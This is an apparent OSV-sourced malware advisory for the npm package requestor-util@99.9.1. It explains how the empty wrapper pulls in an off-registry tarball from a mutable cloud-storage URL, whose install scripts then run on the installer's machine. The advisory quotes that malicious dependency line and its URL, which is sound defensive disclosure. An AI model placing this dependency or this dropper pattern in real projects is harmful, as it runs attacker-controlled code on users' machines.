Logo
npm

requestor-util@99.9.1

Vulnerability report · Last retrieved from osv.dev October 8, 2026 at 1:37 AM UTC

Malicious

OSV ID

MAL-2026-10965

Ecosystem

npm

Summary

requestor-util@99.9.1 is a hollow wrapper (empty index.js, placeholder 99.9.1 version) whose only effect on install is to resolve a dependency declared as a direct tarball URL: "ltidisafe": "https://ltidi.storage.googleapis.com/depenconf/ltidisafe-3.4.6.tgz". npm install fetches whatever bytes currently live at that mutable Google Cloud Storage URL and executes any preinstall/install/postinstall lifecycle scripts contained in that tarball on the installer's machine. The URL is not on the npm registry (bypassing registry-side scanning) and is controlled by whoever owns the GCS bucket, who can swap the payload at any time without republishing the wrapper. The hollow-main + off-registry-tarball-dependency shape matches the dropper-lure pattern: the wrapper's function is to force resolution of an attacker-mutable external artifact into every installer's dependency tree.

Source: amazon-inspector (d8a60f357ab63e9818e450e4e4aec3dcf1b08d1242931ad5ad8468a460ee82ba)

Protect your entire dependency tree

Scan your lock files automatically on every PR. Block malicious packages before they reach production.